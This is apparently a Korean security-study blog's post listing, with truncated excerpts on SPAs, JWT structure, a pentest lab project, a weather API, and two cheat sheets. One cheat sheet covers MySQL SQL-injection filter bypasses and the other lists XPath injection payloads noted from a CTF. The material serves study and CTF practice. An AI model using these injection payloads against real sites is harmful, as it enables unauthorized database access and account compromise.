💡SPA(Single Page Application)란? SPA란 용어 그대로 단일 페이지로 이루어진 애플리케이션이다. 기존에는 사용자가 새로운 페이지로 이동할 때마다 새로운 html을 받아와 페이지를 로드해 보여주었다. 새로운 화면을 보여주기 위해 매번 서버에 요청하기 때문에 성능상의 문제가 생길 수 있다. 그래서 서버로부터 완전한 새로운 페이지를 불러오지 않고 현재의 페이지를 동적으로 다시 작성함으로써 사용자와 소통하는 웹 애플리케이션인 SPA가 사용되고 있다. 💡SPA 예 우리가 자주 사용하는 서비스인 페이스북, 에어비앤비, 트위터, 넷플릭스도 SPA로 만들어졌다. 💡장점 1. 페이지 이동시 화면 전체를 렌더링 할 필요가 없어 로딩 속도가 빠르다. 2. 프론트엔드와 백엔드의 분리되어 업무 분담이 용..

주석 #, --, /**/ # 에 대한 필터링 대신 ;%00 Express string select 0x6162; -> ab select 0b110000101100010; -> ab select char(0x61, 0x62); -> ab select concat(char(0x61), char(0x62)); -> ab select mid(@@version,12,1); -> n /* Using Gadget... */ select 'adm' 'in'; -> admin select 'ad''min'; -> ad'min select unhex(unhex(3631363236333634)); -> abcd 문자열 우회 mysql> SELECT reverse('nimda'), concat('adm','in'), x'6..

개요 최근 CTF에서 Xpath Injection 관련 취약점이 등장 -> 연구 CheatSheet Exploitation Similar to SQL : "string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())" ' or '1'='1 ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 s..

개요 JWT구조 Header alg : 서명 암호화 알고리즘(ex: HMAC SHA256, RSA) typ : 토큰 유형 Payload 토큰에서 사용할 정보의 조각들인 Claim 이 담겨있다. (실제 JWT 를 통해서 알 수 있는 데이터) 즉, 서버와 클라이언트가 주고받는 시스템에서 실제로 사용될 정보에 대한 내용을 담고 있는 섹션이다. key-value 형식으로 이루어진 한 쌍의 정보를 Claim이라고 칭한다. 페이로드는 정해진 데이터 타입은 없지만, 대표적으로 Registered claims, Public claims, Private claims 이렇게 세 가지로 나뉜다. Registed claims : 미리 정의된 클레임. iss(issuer; 발행자), exp(expireation time; 만료..

layout: post title: " 🔐 모의해킹 사이트 구축 & 웹 침투 테스트" date: 2021-09-04 15:54:50 +0700 categories: "모의해킹" tags: [ PHP, Mariadb, XSS, CSRF, Web Shell. Directory Listing, Blind SQL Injection] description: 모의해킹 사이트를 통해 " image: 목차 개요 사이트 목적 환경 구축 웹 서비스 시작 취약점 점검 4.1 Blind SQL Injection 4.2 XSS 4.3 CSRF 4.4 Web Shell 4.5 Directory Listing 프로젝트 결과 참고자료 개요 CIA 프로젝트 프로젝트의 이름인 CIA는 보안의 3요소 (기밀성, 무결성, 가용성) 에서 가..

title: 🔆 Naver Weather Api date: 2021-08-30 19:16:03 +07:00 tags: [html, php, linux] description: 네이버에서 날씨를 검색해 나오는 데이터 정보들을 쉽게(파싱) 사용할 수 있도록 간단하고 쉽게 제공해 주는 API를 만들어 보았습니다. "이 API는 JSON 포맷의 응답을 전송합니다." image: 개요 PHP, HTML, CSS 언어 공부 (파싱)👇. API 목적 네이버에서 날씨를 검색해 나오는 데이터 정보들을 쉽게(파싱) 사용할 수 있도록 간단하고 쉽게 제공해 주는 API를 만들어 보았습니다. "이 API는 JSON 포맷의 응답을 전송합니다." 환경 구축 LAMP L: Linux (이번 wordpress는 CentOS 7에서 진..